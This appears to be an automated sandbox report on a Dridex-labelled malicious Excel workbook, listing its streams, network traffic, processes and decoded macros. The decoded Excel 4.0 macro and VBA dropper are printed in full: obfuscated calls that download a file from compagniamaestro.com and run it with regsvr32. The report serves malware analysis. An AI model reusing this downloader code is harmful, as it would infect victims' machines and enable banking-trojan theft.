                    VB_GlobalNameSpace
                    VB_Base
                    VB_Customizable
                    VB_TemplateDerived
                    VBA Code
                    Attribute VB_Name = "Questa_cartella_di_lavoro"
                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                    Attribute VB_GlobalNameSpace = False
                    Attribute VB_Creatable = False
                    Attribute VB_PredeclaredId = True
                    Attribute VB_Exposed = True
                    Attribute VB_TemplateDerived = False
                    Attribute VB_Customizable = True

                    Streams

                    Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 564
                    General
                    Stream Path:PROJECT
                    File Type:ASCII text, with CRLF line terminators
                    Stream Size:564
                    Entropy:5.25985243733
                    Base64 Encoded:True
                    Data ASCII:I D = " { 0 5 6 6 E 4 0 1 - 8 0 6 F - 4 7 1 6 - B 6 4 7 - E 0 B 8 5 9 A 4 D 5 7 D } " . . D o c u m e n t = Q u e s t a _ c a r t e l l a _ d i _ l a v o r o / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F o g l i o 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l o 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 8 D A 6 F 9 5 7 3 9 5 7 3 9 5 7 3 9 5 7 3 " . . D P B = " B 0 B 2 0 7 6 8 0 8 6 8 0
                    Data Raw:49 44 3d 22 7b 30 35 36 36 45 34 30 31 2d 38 30 36 46 2d 34 37 31 36 2d 42 36 34 37 2d 45 30 42 38 35 39 41 34 44 35 37 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 6f 67 6c 69 6f 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d
                    Stream Path: PROJECTwm, File Type: data, Stream Size: 128
                    General
                    Stream Path:PROJECTwm
                    File Type:data
                    Stream Size:128
                    Entropy:3.34420769179
                    Base64 Encoded:False
                    Data ASCII:Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . Q . u . e . s . t . a . _ . c . a . r . t . e . l . l . a . _ . d . i . _ . l . a . v . o . r . o . . . F o g l i o 1 . F . o . g . l . i . o . 1 . . . M o d u l o 1 . M . o . d . u . l . o . 1 . . . . .
                    Data Raw:51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 00 51 00 75 00 65 00 73 00 74 00 61 00 5f 00 63 00 61 00 72 00 74 00 65 00 6c 00 6c 00 61 00 5f 00 64 00 69 00 5f 00 6c 00 61 00 76 00 6f 00 72 00 6f 00 00 00 46 6f 67 6c 69 6f 31 00 46 00 6f 00 67 00 6c 00 69 00 6f 00 31 00 00 00 4d 6f 64 75 6c 6f 31 00 4d 00 6f 00 64 00 75 00 6c 00 6f 00 31 00 00 00 00 00
                    Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 3535
                    General
                    Stream Path:VBA/_VBA_PROJECT
                    File Type:data
                    Stream Size:3535
                    Entropy:4.33045908783
                    Base64 Encoded:False
                    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
                    Data Raw:cc 61 b2 00 00 03 00 ff 10 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                    Stream Path: VBA/dir, File Type: data, Stream Size: 847
                    General
                    Stream Path:VBA/dir
                    File Type:data
                    Stream Size:847
                    Entropy:6.50704839241
                    Base64 Encoded:True
                    Data ASCII:. K . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . H . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                    Data Raw:01 4b b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 48 c3 aa 61 01 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                    Macro 4.0 Code

                    CALL("Sh"&U&"ll32", "Sh"&U&"llEx"&U&"cut"&U&"A", "JJCCCCJ", y, "Op"&U&"n", "r"&U&"gsvr32", " -"&if&" "&B&D&F, y, y)
                    
                    "=CALL(""Sh""&U&""ll32"",""Sh""&U&""llEx""&U&""cut""&U&""A"", ""JJCCCCJ"",y,""Op""&U&""n"",""r""&U&""gsvr32"","" -""&if&"" ""&B&D&F,y,y)"=RETURN()

                    OLE File "/opt/package/joesandbox/database/analysis/344478/sample/Dridex-06-bc1b.xlsm"

                    Indicators

                    Has Summary Info:False
                    Application Name:unknown
                    Encrypted Document:False
                    Contains Word Document Stream:
                    Contains Workbook/Book Stream:
                    Contains PowerPoint Document Stream:
                    Contains Visio Document Stream:
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:False

                    Summary

                    Author:brt
                    Last Saved By:
                    Create Time:2020-11-24T09:53:01Z
                    Last Saved Time:2020-11-24T11:16:24Z
                    Creating Application:Microsoft Excel
                    Security:0

                    Document Summary

                    Thumbnail Scaling Desired:false
                    Company:
                    Contains Dirty Links:false
                    Shared Document:false
                    Changed Hyperlinks:false
                    Application Version:16.0300

                    Streams

                    Stream Path: \x1CompObj, File Type: data, Stream Size: 112
                    General
                    Stream Path:\x1CompObj
                    File Type:data
                    Stream Size:112
                    Entropy:4.6011544911
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . . . . . . n ` . . . . . . . . ` . . . . . . M i c r o s o f t F o r m s 2 . 0 F r a m e . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F r a m e . 1 . . 9 . q . . . . . . . . . . . .
                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 20 18 6e 60 f4 ce 11 9b cd 00 aa 00 60 8e 01 1a 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 72 61 6d 65 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0e 00 00 00 46 6f 72 6d 73 2e 46 72 61 6d 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                    Stream Path: f, File Type: data, Stream Size: 54
                    General
                    Stream Path:f
                    File Type:data
                    Stream Size:54
                    Entropy:1.81172045559
                    Base64 Encoded:False
                    Data ASCII:. . ( . . . . . . . . . . . . . . . . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:00 04 28 00 06 0c 06 08 0e 00 00 80 0e 00 00 80 03 00 00 00 0e 00 00 80 00 7d 00 00 84 00 00 00 84 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Stream Path: o, File Type: empty, Stream Size: 0
                    General
                    Stream Path:o
                    File Type:empty
                    Stream Size:0
                    Entropy:0.0
                    Base64 Encoded:False
                    Data ASCII:
                    Data Raw:

                    Macro 4.0 Code

                    CALL("Sh"&U&"ll32", "Sh"&U&"llEx"&U&"cut"&U&"A", "JJCCCCJ", y, "Op"&U&"n", "r"&U&"gsvr32", " -"&if&" "&B&D&F, y, y)
                    
                    "=CALL(""Sh""&U&""ll32"",""Sh""&U&""llEx""&U&""cut""&U&""A"", ""JJCCCCJ"",y,""Op""&U&""n"",""r""&U&""gsvr32"","" -""&if&"" ""&B&D&F,y,y)"=RETURN()

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jan 26, 2021 16:16:52.647237062 CET49167443192.168.2.22199.192.21.36
                    Jan 26, 2021 16:16:53.031683922 CET44349167199.192.21.36192.168.2.22
                    Jan 26, 2021 16:16:53.031779051 CET49167443192.168.2.22199.192.21.36
                    Jan 26, 2021 16:16:53.040821075 CET49167443192.168.2.22199.192.21.36
                    Jan 26, 2021 16:16:53.436954021 CET44349167199.192.21.36192.168.2.22
                    Jan 26, 2021 16:16:53.438813925 CET44349167199.192.21.36192.168.2.22
                    Jan 26, 2021 16:16:53.438882113 CET44349167199.192.21.36192.168.2.22
                    Jan 26, 2021 16:16:53.439016104 CET44349167199.192.21.36192.168.2.22
                    Jan 26, 2021 16:16:53.439035892 CET49167443192.168.2.22199.192.21.36
                    Jan 26, 2021 16:16:53.439099073 CET49167443192.168.2.22199.192.21.36
                    Jan 26, 2021 16:16:53.439116001 CET49167443192.168.2.22199.192.21.36
                    Jan 26, 2021 16:16:53.454781055 CET49167443192.168.2.22199.192.21.36
                    Jan 26, 2021 16:16:53.833894014 CET44349167199.192.21.36192.168.2.22
                    Jan 26, 2021 16:16:53.833924055 CET44349167199.192.21.36192.168.2.22
                    Jan 26, 2021 16:16:53.834187984 CET49167443192.168.2.22199.192.21.36
                    Jan 26, 2021 16:16:55.394364119 CET49167443192.168.2.22199.192.21.36
                    Jan 26, 2021 16:16:55.774748087 CET44349167199.192.21.36192.168.2.22
                    Jan 26, 2021 16:16:55.779407978 CET44349167199.192.21.36192.168.2.22
                    Jan 26, 2021 16:16:55.779485941 CET44349167199.192.21.36192.168.2.22
                    Jan 26, 2021 16:16:55.779527903 CET44349167199.192.21.36192.168.2.22
                    Jan 26, 2021 16:16:55.779566050 CET44349167199.192.21.36192.168.2.22
                    Jan 26, 2021 16:16:55.779604912 CET44349167199.192.21.36192.168.2.22
                    Jan 26, 2021 16:16:55.779633045 CET49167443192.168.2.22199.192.21.36
                    Jan 26, 2021 16:16:55.779691935 CET49167443192.168.2.22199.192.21.36
                    Jan 26, 2021 16:16:55.780330896 CET44349167199.192.21.36192.168.2.22
                    Jan 26, 2021 16:16:55.780371904 CET44349167199.192.21.36192.168.2.22
                    Jan 26, 2021 16:16:55.780411959 CET44349167199.192.21.36192.168.2.22
                    Jan 26, 2021 16:16:55.780435085 CET49167443192.168.2.22199.192.21.36
                    Jan 26, 2021 16:16:55.780463934 CET49167443192.168.2.22199.192.21.36
                    Jan 26, 2021 16:16:55.780538082 CET44349167199.192.21.36192.168.2.22
                    Jan 26, 2021 16:16:55.780575037 CET44349167199.192.21.36192.168.2.22
                    Jan 26, 2021 16:16:55.780606031 CET49167443192.168.2.22199.192.21.36
                    Jan 26, 2021 16:16:55.780636072 CET49167443192.168.2.22199.192.21.36
                    Jan 26, 2021 16:18:00.778804064 CET44349167199.192.21.36192.168.2.22
                    Jan 26, 2021 16:18:00.778858900 CET44349167199.192.21.36192.168.2.22
                    Jan 26, 2021 16:18:00.778913975 CET49167443192.168.2.22199.192.21.36
                    Jan 26, 2021 16:18:00.778965950 CET49167443192.168.2.22199.192.21.36
                    Jan 26, 2021 16:18:51.458421946 CET49167443192.168.2.22199.192.21.36
                    Jan 26, 2021 16:18:51.458503962 CET49167443192.168.2.22199.192.21.36
                    Jan 26, 2021 16:18:51.839639902 CET44349167199.192.21.36192.168.2.22
                    Jan 26, 2021 16:18:51.839720964 CET49167443192.168.2.22199.192.21.36

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jan 26, 2021 16:16:52.568312883 CET5219753192.168.2.228.8.8.8
                    Jan 26, 2021 16:16:52.629705906 CET53521978.8.8.8192.168.2.22
                    Jan 26, 2021 16:16:54.171509981 CET5309953192.168.2.228.8.8.8
                    Jan 26, 2021 16:16:54.221276999 CET53530998.8.8.8192.168.2.22
                    Jan 26, 2021 16:16:54.235192060 CET5283853192.168.2.228.8.8.8
                    Jan 26, 2021 16:16:54.282988071 CET53528388.8.8.8192.168.2.22
                    Jan 26, 2021 16:16:54.821381092 CET6120053192.168.2.228.8.8.8
                    Jan 26, 2021 16:16:54.878948927 CET53612008.8.8.8192.168.2.22
                    Jan 26, 2021 16:16:54.891345978 CET4954853192.168.2.228.8.8.8
                    Jan 26, 2021 16:16:54.941071987 CET53495488.8.8.8192.168.2.22

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    Jan 26, 2021 16:16:52.568312883 CET192.168.2.228.8.8.80xccaeStandard query (0)compagniamaestro.comA (IP address)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    Jan 26, 2021 16:16:52.629705906 CET8.8.8.8192.168.2.220xccaeNo error (0)compagniamaestro.com199.192.21.36A (IP address)IN (0x0001)

                    HTTPS Packets

                    TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                    Jan 26, 2021 16:16:53.438882113 CET199.192.21.36443192.168.2.2249167CN=bamoli.de CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.Sat Nov 28 07:26:47 CET 2020 Thu Mar 17 17:40:46 CET 2016Fri Feb 26 07:26:47 CET 2021 Wed Mar 17 17:40:46 CET 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                    CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=USCN=DST Root CA X3, O=Digital Signature Trust Co.Thu Mar 17 17:40:46 CET 2016Wed Mar 17 17:40:46 CET 2021

                    Code Manipulations

                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Start time:16:16:40
                    Start date:26/01/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                    Imagebase:0x13fcb0000
                    File size:27641504 bytes
                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:16:16:49
                    Start date:26/01/2021
                    Path:C:\Windows\System32\regsvr32.exe
                    Wow64 process (32bit):false
                    Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\LO400F\PI909U\960.
                    Imagebase:0xffbb0000
                    File size:19456 bytes
                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:16:16:49
                    Start date:26/01/2021
                    Path:C:\Windows\System32\regsvr32.exe
                    Wow64 process (32bit):false
                    Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\SD120E\EP146E\960.
                    Imagebase:0xffbb0000
                    File size:19456 bytes
                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:16:16:50
                    Start date:26/01/2021
                    Path:C:\Windows\System32\regsvr32.exe
                    Wow64 process (32bit):false
                    Commandline:'C:\Windows\System32\regsvr32.exe' -s C:\QP101F\TL941X\960.
                    Imagebase:0xffbb0000
                    File size:19456 bytes
                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Code Analysis

                    Call Graph

                    Graph

                    • Entrypoint
                    • Decryption Function
                    • Executed
                    • Not Executed
                    • Show Help
                    callgraph 10 PagamentoDocumento Asc:1,Replace:1,Len:1,Mid:1,Run:1, Chr:1,Split:1 152 excell Now:1 10->152 161 pagoUno_Layout 161->10 167 BarUno Close:1

                    Module: Foglio1

                    Declaration
                    LineContent
                    1

                    Attribute VB_Name = "Foglio1"

                    2

                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                    3

                    Attribute VB_GlobalNameSpace = False

                    4

                    Attribute VB_Creatable = False

                    5

                    Attribute VB_PredeclaredId = True

                    6

                    Attribute VB_Exposed = True

                    7

                    Attribute VB_TemplateDerived = False

                    8

                    Attribute VB_Customizable = True

                    9

                    Attribute VB_Control = "pagoUno, 10, 0, MSForms, Frame"

                    Executed Functions
                    APIsMeta Information

                    Cells

                    Cells

                    SpecialCells

                    xlCellTypeConstants

                    Len

                    Len("C TSeDbaUEm- pO E@K NIzDAI) T!sGWCt!wq-uK!ccbJWdLzt sHqsNgnW #pP(Yw|DYRdXF HSvs/ fMvZBfyLZRF V'L #ZulXS#xq+CuBC BipPZkRfW)k ,Sy1 s-aO6eu( +eR0WS4W 4wg0NbOwpJAi'dJ*er(l |AuROGFcZS L/w MNQBiFL Fy 'ry#apxrn#E +xEDMxNz T a'l SmV@tzErcHXCBDKMygT B'n 7Nl/ *AO(eQ. NB NPqUR )yH5mL1R )NFQZfHsI) F(wc0SD0 k9rh/ m*x (u | uR iFkSSjs/deMrHBpRLqrFz 'vj#o CHT#AF+eo#HA[zu#vG(FG| HRSsFH SnE/b MFYBJzLbSFN 'Wn#kMJ s#Fj+yc#gwvWI#fn( E| HR UF RSzE/GhMPLBSDL gF x'cA#jRY a# K+Oa#G na #cx(FV|zQHOPGZQ'reJhzRygOOATXbN OAA FgXQ U)JBRD Fdj@ GSBTBnuIYe'BiLQk+ JHWCDDiUIr-qGXr NvvSUZJGGTNvO QBZpBEOFdZ'Xg2Vv(yx*M ( L-ES\x1fXG-jaB VMSpNNNTBuDFB)t ShsSjvTs FB (mF*wOzLMTL DfHU W-LdOyw@NDNegDZf) !AyBac!cC-Fu! XD M9 #HH%IsEIv%qHD dGdwBuHQ b)SlQ jB uMJ EeTAN F KSzdXeGDVtFi MLP)Wj5EK6N +sFn X(Ly*Mv%zCDxmGO BkrQMd) TQCnB RMOeEnDAPiFP S AXaiDTEFAEMnU)Nx5Qk6 P+nCnmV(yq*qg%PfSW @h ObrC uCOtDYoUu VcFF DDskO Z'VS2d /Nk1D +zK:cG8is:XC(iA'N BckI @VdSFd'BySze@raOKMCURCnaDkfUVJVdsFg D cOGg' 7NC4B -cKlgN*Uh(Vi* vzOcTTxDUqUMK-MIO r@HFN lDyK)TH!KxjkBeYM#Lx+IGD tGTBBfhQ o)Ey0wG2G 4w *cC(XY|uXRtsFsSSrv/JBM B jLW FX ' l#mIA Q#Bc+ ZBHE%msEaQ%JwDNdGpEB OQQN) QynBIrMC E cArSFsUSVvXcrDnDFGJM Q)ae5Yt6 + unP (bR*SP% wDsfG nBXwQeL)qRQmHBAQMMLE GAbHFC SyLXvmDadFypMBH)Bz5Dm6kN+ninx ( s*S %WQSbm@YDO aCuKCOkD IUaGVXdFEVDrzOXn' 2V /TA1Pr+ O: m8PK:Gu(F 'GxBHwITr@VkSOe'QwSoI@ GOtbC zC DuWUuaV QFgXDrYO w'Tx7FE4Lq-Gol F*Zv(It*bKzR TlBDXJUDD-y OGI@ZrNWjD )UC!McG P!vN-wpFb F ZSDb/ IVvBPuaQITLufRaPQMU@tLDLvD L)fw0xA4aM(G 'y !kZ/ p!Rj* zepTmYDb U -ajOsP@MYNuBDYn)dc!e VhQ!lF-bd!sxfEl!xj*zRzF DYu@jHMSUK f)p !XsLJy!vu'JFTsv'NE!QosFzmk #Cv%rLVyG%PT# eksq4nL1ws#FT+wv#LUBGos !h 'wJTs ' q!a bAksfl#JM% VVNQ%xU#JDChFjeEqGYfckbEXuHK!wn'OXYQm' L!I s x pBrf!Uu-sL!w KoOB JKHH!lO-bQ@Ba-t xkR*RgzT TElDseUzW-vBOsC@KxN DDKq)vH!afHBL!TK-QeRnBFTZS n/cnMrNBErLaLFhQ'JQ#fmgfH#aN+SM#filAxqwk`Arhuxm zjcD`xSnjq!vT*n (Dd|zABZTBhwKnrM 'VM#OxJzUfbeqSyoQA!ei'YhTUp'z !XwmSX2Ti3 j! V-AS!ytDtbq fp ` Ku GdXOElXh sBw!Yl'ooTCB'dI!xfds sAB#UB%n [Fq%Zb#NWqOfz q@ H#g +ol#XaZFoD Z P#lW+UKCAG+iTzxC(zp| B SBUlKwKMKW'Nw#HLT FShXKcPNZwN Oyy!ub-y ! SV QRwMjjCdp#MR%ix[ V% f#Y v fovUkqV# U%aK[ U%hv# a`Oae fSo #qm%KK[iR%yL#Y ExbjnCkf fj @nD#cg+Q !j !yd\iaZLbDm Bvc\ PZLe# O+KhzzX+zmS vDvbQqDKFPB zBO FoW'Cc#TIgRMrpfokLtez9 J#Pa%zNHyADxqUA -cKX bNatSAkJYUTz OroB UB kFi 'oV:rX(Pg'a FMaF ESbh/CuVR PZ QLZL nRNjQIV@o DYHDbO) B8 m*NZ% z#o bSnpB !HI'U gjA' XU 'JSQS Js FwKIxbSSO)bbEGT* G% t#iabbk#eX%RF[xL%H #Z lqM#N + m3Y +Kp2Zu+ #Egs uuCr!en*q +UBCmb%AmEe % zGTF+RNzBK+ zdi(Di|Q BvQBPzKwxMph' I#h RNli !c 'zyTru'ry! DmLLkAN4T 1sq#iC+XF#LYR uihq!hO'PWThW'Ro!olmjqk OFCEwFD#BH%dpV t%ZE#goboXvsAsgm#Pk%c VK %vk#Nj@og# n+jg! !aW\xJZmNDX BgVD HB \Kn!xw-TPxif- A!IFPQRomO#HM%u Vow%xK#CZmHy#NF+ZU# OqRG#WO% CVdx%Oz#zjfZctT ubqsJO2sb3Nq!sC- f!OK!RP,Cz#Qh% zjktegR'yb!Jf!FE!DB'HVArH' fC x'KyEYJ-DzxoZ- ax O*") -> 2841

                    Chr

                    Asc

                    Mid

                    Split

                    Cells

                    Replace

                    Replace("SET.NAME("V","aestro")","[","J") -> SET.NAME("V","aestro") Replace("SET.NAME("m",ACOS(-0.5)*135/PI())","[","J") -> SET.NAME("m",ACOS(-0.5)*135/PI()) Replace("SET.NAME("y",COS(RADIANS(60))-COS(60*PI()/180))","[","J") -> SET.NAME("y",COS(RADIANS(60))-COS(60*PI()/180)) Replace("SET.NAME("D","\")","[","J") -> SET.NAME("D","\") Replace("SET.NAME("K","w")","[","J") -> SET.NAME("K","w") Replace("SET.NAME("Z","o")","[","J") -> SET.NAME("Z","o") Replace("IF(ISNUMBER(SEARCH(K,GET.WORKSPACE(1))), ,CLOSE(TRUE))","[","J") -> IF(ISNUMBER(SEARCH(K,GET.WORKSPACE(1))), ,CLOSE(TRUE)) Replace("SET.NAME("A","C:"&D&CHAR(RANDBETWEEN(65,m))&CHAR(RANDBETWEEN(65,m))&RANDBETWEEN(100,999)&CHAR(RANDBETWEEN(65,m)))","[","J") -> SET.NAME("A","C:"&D&CHAR(RANDBETWEEN(65,m))&CHAR(RANDBETWEEN(65,m))&RANDBETWEEN(100,999)&CHAR(RANDBETWEEN(65,m))) Replace("SET.NAME("if",CHAR(115))","[","J") -> SET.NAME("if",CHAR(115)) Replace("SET.NAME("B",A&D&CHAR(RANDBETWEEN(65,m))&CHAR(RANDBETWEEN(65,m))&RANDBETWEEN(100,999)&CHAR(RANDBETWEEN(65,m)))","[","J") -> SET.NAME("B",A&D&CHAR(RANDBETWEEN(65,m))&CHAR(RANDBETWEEN(65,m))&RANDBETWEEN(100,999)&CHAR(RANDBETWEEN(65,m))) Replace("SET.NAME("F",GET.WORKSPACE(13)&".")","[","J") -> SET.NAME("F",GET.WORKSPACE(13)&".") Replace("SET.NAME("U","e")","[","J") -> SET.NAME("U","e") Replace("CALL("K"&U&"rn"&U&"l32","Cr"&U&"at"&U&"Direct"&Z&"ryA","JCJ",A,y)","[","J") -> CALL("K"&U&"rn"&U&"l32","Cr"&U&"at"&U&"Direct"&Z&"ryA","JCJ",A,y) Replace("SET.NAME("G",SET.NAME("h","mpagniam"))","[","J") -> SET.NAME("G",SET.NAME("h","mpagniam")) Replace("CALL("Kern"&U&"l32","CreateDir"&U&"ct"&Z&"ryA","[C[",B,y)","[","J") -> CALL("Kern"&U&"l32","CreateDir"&U&"ct"&Z&"ryA","JCJ",B,y) Replace("CALL("URLMON","URLD"&Z&"wnl"&Z&"adT"&Z&"FileA", "[[CC[[",y,REPLACE("hqps:"&GET.WORKSPACE(9)&GET.WORKSPACE(9)&"co"&h&V&RIGHT(F)&"c"&Z&"m",2,1,"tt"),B&D&F,y,y)","[","J") -> CALL("URLMON","URLD"&Z&"wnl"&Z&"adT"&Z&"FileA", "JJCCJJ",y,REPLACE("hqps:"&GET.WORKSPACE(9)&GET.WORKSPACE(9)&"co"&h&V&RIGHT(F)&"c"&Z&"m",2,1,"tt"),B&D&F,y,y) Replace("CALL("Sh"&U&"ll32","Sh"&U&"llEx"&U&"cut"&U&"A", "[[CCCC[",y,"Op"&U&"n","r"&U&"gsvr32"," -"&if&" "&B&D&F,y,y)","[","J") -> CALL("Sh"&U&"ll32","Sh"&U&"llEx"&U&"cut"&U&"A", "JJCCCCJ",y,"Op"&U&"n","r"&U&"gsvr32"," -"&if&" "&B&D&F,y,y)

                    Run

                    Run("Auto_io22") Run("Auto_io22")

                    Part of subcall function excell@Foglio1: OnTime

                    Part of subcall function excell@Foglio1: Now

                    StringsDecrypted Strings
                    "=RE"
                    "TURN()"
                    "Aut"
                    "{"
                    "="
                    "J"
                    "["
                    "="
                    "J"
                    "["
                    LineInstructionMeta Information
                    10

                    Sub PagamentoDocumento()

                    11

                    j = "=RE"

                    executed
                    12

                    m = "TURN()"

                    13

                    Sheets(1).Cells(6, 1).value = j & m

                    Cells

                    13

                    mg = "Aut"

                    14

                    Sheets(1).Cells(1, 1).Name = mg & "o_io22"

                    Cells

                    15

                    c = 3

                    16

                    For Each p in ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants)

                    SpecialCells

                    xlCellTypeConstants

                    16

                    n = n & p

                    16

                    Next

                    SpecialCells

                    xlCellTypeConstants

                    17

                    For X = c To Len(n) Step c

                    Len("C TSeDbaUEm- pO E@K NIzDAI) T!sGWCt!wq-uK!ccbJWdLzt sHqsNgnW #pP(Yw|DYRdXF HSvs/ fMvZBfyLZRF V'L #ZulXS#xq+CuBC BipPZkRfW)k ,Sy1 s-aO6eu( +eR0WS4W 4wg0NbOwpJAi'dJ*er(l |AuROGFcZS L/w MNQBiFL Fy 'ry#apxrn#E +xEDMxNz T a'l SmV@tzErcHXCBDKMygT B'n 7Nl/ *AO(eQ. NB NPqUR )yH5mL1R )NFQZfHsI) F(wc0SD0 k9rh/ m*x (u | uR iFkSSjs/deMrHBpRLqrFz 'vj#o CHT#AF+eo#HA[zu#vG(FG| HRSsFH SnE/b MFYBJzLbSFN 'Wn#kMJ s#Fj+yc#gwvWI#fn( E| HR UF RSzE/GhMPLBSDL gF x'cA#jRY a# K+Oa#G na #cx(FV|zQHOPGZQ'reJhzRygOOATXbN OAA FgXQ U)JBRD Fdj@ GSBTBnuIYe'BiLQk+ JHWCDDiUIr-qGXr NvvSUZJGGTNvO QBZpBEOFdZ'Xg2Vv(yx*M ( L-ES\x1fXG-jaB VMSpNNNTBuDFB)t ShsSjvTs FB (mF*wOzLMTL DfHU W-LdOyw@NDNegDZf) !AyBac!cC-Fu! XD M9 #HH%IsEIv%qHD dGdwBuHQ b)SlQ jB uMJ EeTAN F KSzdXeGDVtFi MLP)Wj5EK6N +sFn X(Ly*Mv%zCDxmGO BkrQMd) TQCnB RMOeEnDAPiFP S AXaiDTEFAEMnU)Nx5Qk6 P+nCnmV(yq*qg%PfSW @h ObrC uCOtDYoUu VcFF DDskO Z'VS2d /Nk1D +zK:cG8is:XC(iA'N BckI @VdSFd'BySze@raOKMCURCnaDkfUVJVdsFg D cOGg' 7NC4B -cKlgN*Uh(Vi* vzOcTTxDUqUMK-MIO r@HFN lDyK)TH!KxjkBeYM#Lx+IGD tGTBBfhQ o)Ey0wG2G 4w *cC(XY|uXRtsFsSSrv/JBM B jLW FX ' l#mIA Q#Bc+ ZBHE%msEaQ%JwDNdGpEB OQQN) QynBIrMC E cArSFsUSVvXcrDnDFGJM Q)ae5Yt6 + unP 